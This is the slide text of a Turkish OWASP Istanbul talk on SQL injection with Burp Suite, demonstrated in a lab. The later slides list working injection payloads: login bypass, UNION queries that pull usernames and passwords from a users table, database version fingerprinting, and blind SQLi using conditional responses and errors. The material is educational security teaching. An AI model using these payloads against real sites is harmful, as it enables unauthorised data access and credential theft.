05 Kasım 2022 tarihinde #owaspistanbul etkinliğinde gerçekleştirdiğim sunumu görmektesiz. Burp Suite web proxy uygulaması kullanılarak nasıl SQL Injection Attack gerçekleştirilebilir anlatılmış ve Lab ortamında uygulması gerçekleştirilmiştir. Etkinlik sunumuna youtube kanalımdan erişebilirsiniz. (Bilişimci Kız) Sunumun detaylı makale hali https://bilisimcikiz.com adresinde yer almaktadır.
2. RUMEYSA BOZDEMİR
• Computer Programming - Associate Degree
• Management Information System - Bachelor’s Degree
• ITIL 4 Foundation Certificate in IT Service Management
• ISO27001 LA - CQI|IRCA
• C|EH - EC - Council
• IT Expertise – BEM
• Cyber Security Specialist – TUBITAK
• OWASP Chapter Leaders - Istanbul
@owaspistanbul - rumeysabozdemir@gmail.com
3. OWASP
• Kar amacı gütmeyen ve yazılım güvenliğini artırmak için çalışan bir
kuruluştur.
• Yaklaşık 20 yıldır hizmet vermektedir.
• Açık kaynak yazılım projeleri
• Yüzlerce yerel bölüm
• On binlerce üye
• Eğitim / Konferans
@owaspistanbul - rumeysabozdemir@gmail.com
5. OWASP INFO
@owaspistanbul - rumeysabozdemir@gmail.com
• Burp Suite Nedir?
• Burp Suite Nasıl Kullanılır?
• SQL Injection Zafiyeti Nedir?
• SQL Injection Zafiyetinin Etkileri Nedir?
• Sql Injectıon Örnekleri
• WHERE ile Gizli Verileri Çekme
• Login Bypass Etme
• UNION Attack ile Sütun Sayısı Döndürme
• UNION Attack ile Metin İçeren Sütun Bulma
• UNION Attack ile Tablodan Veri Çekme
• UNION Attack ile Bir Sütuna Birden Fazla Veri
Çekme
• Oracle Veritabanından Versiyon Öğrenme
• MySQL ve Microsoft Veritabanı ve Versiyon Bilgisini
Çekme
• Oracle Dışındaki Veritabanlarında SQLi Saldırıları
• Oracle Veritabanlarında SQLi Saldırıları
• Koşullu Yanıtlar İle Blind SQLi Zafiyeti
• Koşullu Sorgularda Hataları Yorumlayarak Blind SQLi
Sömürme
6. OWASP | BURP SUITE NEDİR?
@owaspistanbul - rumeysabozdemir@gmail.com
• JAVA dilinde yazılmıştır.
• Web Proxy uygulamasıdır.
• Web uygulama testlerinde kullanılır.
8. OWASP | BURP SUITE NASIL KULLANILIR?
@owaspistanbul - rumeysabozdemir@gmail.com
• Uygulama için ihtiyacımız olanlar;
• Burp Suite Community Edition
• https://portswigger.net/burp/communitydownload
• Kali Linux ya da Windows OS
• https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/
12. OWASP | SQL INJECTION ZAFİYETİ
NEDİR?
@owaspistanbul - rumeysabozdemir@gmail.com
• SQL injection (SQLi), bir uygulamanın veritabanı ile iletişimi esnasında
birtakım teknikleri kullanarak sorgulara müdahale etme işlemidir.
• Son kullanıcının görmemesi gereken, bilmemesi gereken ya da
erişmemesi gereken bilgilere erişme durumudur.
13. OWASP | SQL INJECTION ZAFİYETİNİN
ETKİLERİ NEDİR?
@owaspistanbul - rumeysabozdemir@gmail.com
• İllegal şekilde yayılma,
• Dark Web satış,
• Parola,
• Kredi kartı bilgileri,
• Kişisel veriler,
• Backdoor
14. OWASP | SQL INJECTION ÖRNEKLERİ
@owaspistanbul - rumeysabozdemir@gmail.com
• Gizli Verileri Çekme
• Uygulama Mantığını Alt Üst Etme
• UNION Saldırıları
• Kullanılan Veritabanını İnceleme
• Blind SQL Injection
15. OWASP | WHERE İLE GİZLİ VERİLERİ
ÇEKME
@owaspistanbul - rumeysabozdemir@gmail.com
• SQL sorgusu yaparken;
• SELECT, DELETE, UPDATE ve INSERT gibi değerler kullanılır.
• WHERE değeri ile de tablodaki hangi sütundan veri çekilecek ise o
belirtilir ve sorgular istenilen veriye/bilgiye göre şekillendirilir.
ÖRNEK KULLANIM
• SELECT * FROM products WHERE category = ''' AND released = 1
16. OWASP | LOGIN BYPASS ETME
@owaspistanbul - rumeysabozdemir@gmail.com
• Oturum değişkenlerine müdahale,
• Texboxlara direkt komut yazma,
ÖRNEK KULLANIM
• Or, AND
• =, --
• ‘ , (, / vb.
17. OWASP | UNION ATTACK İLE SÜTUN
SAYISI DÖNDÜRME
@owaspistanbul - rumeysabozdemir@gmail.com
ÖRNEK KULLANIM
• UNION SELECT NULL, NULL—
• ORDER BY 1--
18. OWASP | UNION ATTACK İLE METİN
İÇEREN SÜTUN BULMA
@owaspistanbul - rumeysabozdemir@gmail.com
ÖRNEK KULLANIM
• UNION SELECT NULL, ‘bilisimcikiz’, NULL--
19. OWASP | UNION ATTACK İLE
TABLODAN VERİ ÇEKME
@owaspistanbul - rumeysabozdemir@gmail.com
ÖRNEK KULLANIM
• UNION SELECT username, password FROM users--
20. OWASP | UNION ATTACK İLE BİR
SÜTUNA BİRDEN FAZLA VERİ ÇEKME
@owaspistanbul - rumeysabozdemir@gmail.com
ÖRNEK KULLANIM
• UNION SELECT NULL, username||'*'||password FROM users--
21. OWASP | ORACLE VERİTABANINDAN
VERSİYON ÖĞRENME
@owaspistanbul - rumeysabozdemir@gmail.com
ÖRNEK KULLANIM
• UNION SELECT banner, 'bilisimcikiz’ FROM v$version--
22. OWASP | MYSQL VE MICROSOFT
VERİTABANI VE VERSİYON BİLGİSİNİ
ÇEKME
@owaspistanbul - rumeysabozdemir@gmail.com
ÖRNEK KULLANIM
• UNION SELECT @@version NULL#
23. OWASP | ORACLE DIŞINDAKİ
VERİTABANLARINDA SQLi
SALDIRILARI
@owaspistanbul - rumeysabozdemir@gmail.com
ÖRNEK KULLANIM
• UNION SELECT username_tqsccf, password_iolsok from
users_jowqzh--
24. OWASP | ORACLE
VERİTABANLARINDA SQLi
SALDIRILARI
@owaspistanbul - rumeysabozdemir@gmail.com
ÖRNEK KULLANIM
• UNION SELECT PASSWORD_LBIELG, USERNAME_AMLAPI FROM
USERS_MGQWPY--
25. OWASP | KOŞULLU YANITLAR İLE
BLIND SQLi ZAFİYETİ
@owaspistanbul - rumeysabozdemir@gmail.com
ÖRNEK KULLANIM
• and (select username from users where username='administrator'
and LENGTH(password)>19)='administrator'--
26. OWASP | KOŞULLU SORGULARDA
HATALARI YORUMLAYARAK BLIND
SQLi SÖMÜRME
@owaspistanbul - rumeysabozdemir@gmail.com
ÖRNEK KULLANIM
• UNION SELECT CASE WHEN (username='administrator') THEN
to_char(1/0) ELSE NULL END FROM users--